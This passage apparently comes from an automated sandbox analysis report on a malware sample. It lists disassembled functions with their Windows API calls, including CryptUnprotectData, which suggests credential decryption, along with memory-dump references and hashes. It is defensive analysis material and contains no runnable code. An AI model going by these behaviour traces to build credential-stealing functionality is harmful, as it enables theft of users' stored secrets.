                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: b55e1a87ec8090373f494b0a30b85cb3df8818b283b39e1a2c8523f11ea0b322
                                    • Instruction ID: f5944ff50538b6983e7bbfa927eff062fa00dbaf86abd015afda834ef903456f
                                    • Opcode Fuzzy Hash: b55e1a87ec8090373f494b0a30b85cb3df8818b283b39e1a2c8523f11ea0b322
                                    • Instruction Fuzzy Hash: EA11D4B4640208EFEB14CFA4D895FAA77B5FB89711F208068F9159F384C7B1AA41DB60
                                    Function 00FB7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FC0E00,00000000,?), ref: 00FB79B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB79B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00FC0E00,00000000,?), ref: 00FB79C4
                                    • wsprintfA.USER32 ref: 00FB79F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 9c724def411c61cf783d1b29a339ac9dfedee9613fc8b2b6169e3e1ce5fa7c1e
                                    • Instruction ID: 7d2369aa55e278c38cd73942d9b6a5fb717406c8e38464acf812fd69f4b53867
                                    • Opcode Fuzzy Hash: 9c724def411c61cf783d1b29a339ac9dfedee9613fc8b2b6169e3e1ce5fa7c1e
                                    • Instruction Fuzzy Hash: 6A112EB2904118ABCB14DFC9E945FBEB7F8FB4CB11F10411AF515A2284D3395940DB71
                                    Function 00FB7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008CDE00,00000000,?,00FC0E10,00000000,?,00000000,00000000), ref: 00FB7A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008CDE00,00000000,?,00FC0E10,00000000,?,00000000,00000000,?), ref: 00FB7A7D
                                    • wsprintfA.USER32 ref: 00FB7AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 6bebab8879eb6fb1a779928ca32aaa5661f9fcfa4211753d5da00d6e45a637bf
                                    • Instruction ID: 6d26c504f99bc37bde18a63daf166f5614733f71a024a63a9505a8f58a4a635b
                                    • Opcode Fuzzy Hash: 6bebab8879eb6fb1a779928ca32aaa5661f9fcfa4211753d5da00d6e45a637bf
                                    • Instruction Fuzzy Hash: DA11C2B1905218DBDB249F94DC45F99BBB8FB44721F1043A9E516932C0C7345A80CF51
                                    Function 00FB3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(00FBE118,00000000,00000001,00FBE108,00000000), ref: 00FB3758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FB37B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: fb85068a6a25415259eaaf3b3b55f2ae22ac9fbae8cce9270292931ebd20975e
                                    • Instruction ID: 5994a277414946b3bc1a79c3122a8ef5a8b1221759a5f36dac5a3eee6b9652de
                                    • Opcode Fuzzy Hash: fb85068a6a25415259eaaf3b3b55f2ae22ac9fbae8cce9270292931ebd20975e
                                    • Instruction Fuzzy Hash: 61410671A40A289FDB24DB58CC94BDBB7B5BB48302F4041D8E608AB290E771AEC5CF50
                                    Function 00FA9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FA9B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FA9BA3
                                    • LocalFree.KERNEL32(?), ref: 00FA9BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 604933f57a7ef5b098d78974eee4a6a77c4e7235badc6d009ba17cb4d793d39f
                                    • Instruction ID: 0c18df4ea5495b8a09ed0ca1583a47ae39a33f5d9f4b189dff327fefd65fbb42
                                    • Opcode Fuzzy Hash: 604933f57a7ef5b098d78974eee4a6a77c4e7235badc6d009ba17cb4d793d39f
                                    • Instruction Fuzzy Hash: DC11FAB8A00209DFDB04DF94D985AAE77F5FF89300F104568E8159B340D774AE50CF61
                                    Function 012D611B Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :coy$@s7;
                                    • API String ID: 0-2320488287
                                    • Opcode ID: 7a88968446e036a58fa5422e63d49a1640519f408430f2b02f88853cf49cf70e
                                    • Instruction ID: 36a7ae688075033c500c462185e8a3444d6ca3f7c5d875da78a59499de060bcf
                                    • Opcode Fuzzy Hash: 7a88968446e036a58fa5422e63d49a1640519f408430f2b02f88853cf49cf70e
                                    • Instruction Fuzzy Hash: EF41E7F3A083089BF3047E59DC8576AB3D9EB94710F1A853CD7D883B44E939A9058396
                                    Function 01237FE2 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: y{V
                                    • API String ID: 0-4047489751
                                    • Opcode ID: 9accaa2b0f35b3252f0aab11926d7ec489589ec83f5929cd140d1d5a44f3ffba
                                    • Instruction ID: bdb7a917dba2763b57d806aadd68d6c656ee64ae5057f57a7aae108ff743a94b
                                    • Opcode Fuzzy Hash: 9accaa2b0f35b3252f0aab11926d7ec489589ec83f5929cd140d1d5a44f3ffba
                                    • Instruction Fuzzy Hash: 1461F5F3E182005FF3149E3DED4576ABBD6DBD4720F1B863DEA8893784E93898058646
                                    Function 01274B01 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *){:
                                    • API String ID: 0-3549467814
                                    • Opcode ID: 7e065eed9117f24f9b115821cf4d1143d33411419678e3cfcb11d63f610e3e44
                                    • Instruction ID: 2331c6d3ad93d39b7405d0135603cf98dbf575f5ce9e459858f3051e227d7698
                                    • Opcode Fuzzy Hash: 7e065eed9117f24f9b115821cf4d1143d33411419678e3cfcb11d63f610e3e44
                                    • Instruction Fuzzy Hash: 1A415CB3E082245FE3085A2DDC557AAB7DAEBD4730F1A453EEA85D7384E9794C0183D2
                                    Function 01337BBE Relevance: .2, Instructions: 229COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ff59c80c4cdc5bc26ccba5976c3d21abaa0c09e700d77ef46d5205d8648963c
                                    • Instruction ID: ec18aee3eba6ca66be82ddfa730d1379bac9362068ed6d8f35f8dcca062221f0
                                    • Opcode Fuzzy Hash: 0ff59c80c4cdc5bc26ccba5976c3d21abaa0c09e700d77ef46d5205d8648963c
                                    • Instruction Fuzzy Hash: 637104F3E083045FE7047E2DDC8976ABBE4EB94720F0A463DDAC497745EA3959048683
                                    Function 012B2F2D Relevance: .2, Instructions: 181COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 87a1d4d6a9ea1dcc7abc6db43c10c197e8a141b7ec59deef29e8abe139c98625
                                    • Instruction ID: 48518d17b443065413ba488f1c4d39a18ed5eade763abe4fa4d6085fbddc035e
                                    • Opcode Fuzzy Hash: 87a1d4d6a9ea1dcc7abc6db43c10c197e8a141b7ec59deef29e8abe139c98625
                                    • Instruction Fuzzy Hash: 2A517CF3E186005BF30CAD2EFC9577A76D6DBD8310F6A863DD986C7780E83848058186
                                    Function 0133E684 Relevance: .2, Instructions: 173COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad54b53e834e520d7d689ede328bb3652e223a668eb4264e40012a19774e622a
                                    • Instruction ID: 118ee5ec6f1d89da26bf31c3ec3eca1edefe0e6722914c3789b90508c6b790f4
                                    • Opcode Fuzzy Hash: ad54b53e834e520d7d689ede328bb3652e223a668eb4264e40012a19774e622a
                                    • Instruction Fuzzy Hash: 9A513CF39083089BD7007A6DEC4577AFBD9EF90620F26493EE684C3380F9B56C458656
                                    Function 01291AF4 Relevance: .1, Instructions: 132COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e4087a20d23b285f4c1e4ef123ac400cd82a834806e99bf6a71fbca30e9beaee
                                    • Instruction ID: 54c4d104012ca03d8daf43b9f7ab1f681e1c84e6b932165406b6777930eab9c8
                                    • Opcode Fuzzy Hash: e4087a20d23b285f4c1e4ef123ac400cd82a834806e99bf6a71fbca30e9beaee
                                    • Instruction Fuzzy Hash: B9313BF3A082046FE3046A4DFC80A7BB7D9D7D4320F2A4639EE94C7740E5369C068692
                                    Function 0139F1AB Relevance: .1, Instructions: 120COMMON
                                    Download Yara Rule
